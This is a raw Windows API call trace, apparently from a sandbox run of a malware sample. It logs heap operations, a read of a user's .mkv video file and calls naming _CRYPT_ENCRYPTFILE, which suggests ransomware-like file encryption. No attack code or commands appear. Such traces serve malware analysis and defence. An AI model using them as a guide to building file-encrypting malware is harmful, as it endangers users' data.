HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0108.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0108.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0108.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0108.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0108.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0108.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0108.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b00 [0108.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0108.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0108.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0108.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0108.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0108.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0108.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0108.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0108.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2930 [0108.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0108.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0108.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0108.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0108.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0108.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0108.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0108.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a00 [0108.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0108.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0108.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0108.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0108.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0108.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0108.635] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0108.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0108.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a40 [0108.635] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0108.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca7c0 [0108.636] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca7c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0108.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0108.636] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0108.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0108.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0108.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0108.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0108.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0108.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ab0 [0108.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2990 [0108.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0108.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0108.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b00 [0108.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x4506008 [0108.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0108.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0108.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0108.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0108.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0108.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0108.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0108.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0108.638] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\tr4gQM\\recAT1.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\tr4gqm\\recat1.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0108.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ad0 [0108.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9c68 [0108.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0108.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0108.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0108.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0108.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a40 [0108.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0108.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0108.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0108.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0108.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0108.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0108.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2930 [0108.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0108.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050e78 [0108.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4506008 | out: hHeap=0x1780000) returned 1 [0108.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0108.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0108.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0108.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b20 [0108.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0108.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0108.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0108.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0108.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0108.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0108.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0108.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0108.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0108.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0108.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0108.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0108.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0108.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0108.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0108.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0108.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0108.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0108.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0108.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0108.640] FreeLibrary (hLibModule=0x772d0000) returned 1 [0108.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0108.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0108.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0108.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0108.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0108.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0108.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0108.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0108.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0108.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0108.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0108.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0108.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0108.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0108.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0108.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0108.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0108.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0108.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0108.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0108.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0108.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0108.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0108.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0108.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0108.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0108.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0108.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0108.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0108.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0108.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0108.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0108.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0108.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0108.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0108.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0108.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0108.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0108.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0108.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0108.642] PeekMessageW (in: lpMsg=0x144e4f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4f4) returned 0 [0108.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9e90 | out: hHeap=0x1780000) returned 1 [0108.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0108.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0108.642] PeekMessageW (in: lpMsg=0x144e4f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4f4) returned 0 [0108.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0108.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0108.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0108.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0108.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0108.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0108.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0108.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0108.642] PeekMessageW (in: lpMsg=0x144e4f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4f4) returned 0 [0108.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0108.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0108.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0108.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0108.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0108.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0108.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0108.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0108.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0108.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0108.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0108.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0108.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0108.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0108.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0108.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0108.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0108.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0108.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0108.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe00 | out: hHeap=0x1780000) returned 1 [0108.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0108.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391af0 | out: hHeap=0x1780000) returned 1 [0108.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0108.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0108.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0108.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0108.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0108.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0108.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0108.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0108.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0108.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0108.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0108.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050e78 | out: hHeap=0x1780000) returned 1 [0108.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0108.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0108.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0108.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0108.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0108.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0108.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0108.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0108.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0108.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0108.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0108.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0108.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0108.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0108.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0108.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0108.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0108.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0108.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0108.645] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0108.645] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0108.645] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43ca4d8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0108.645] CloseHandle (hObject=0x258) returned 1 [0108.646] FreeLibrary (hLibModule=0x772d0000) returned 1 [0108.646] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0108.646] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\tr4gQM\\recAT1.mkv", lpFindFileData=0x144e620 | out: lpFindFileData=0x144e620*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x120192a0, ftCreationTime.dwHighDateTime=0x1d5e27d, ftLastAccessTime.dwLowDateTime=0xe49685f0, ftLastAccessTime.dwHighDateTime=0x1d5e597, ftLastWriteTime.dwLowDateTime=0xe49685f0, ftLastWriteTime.dwHighDateTime=0x1d5e597, nFileSizeHigh=0x0, nFileSizeLow=0x10503, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="recAT1.mkv", cAlternateFileName="")) returned 0x41ac280 [0108.646] FindClose (in: hFindFile=0x41ac280 | out: hFindFile=0x41ac280) returned 1 [0108.646] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0108.646] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0108.646] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0108.813] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 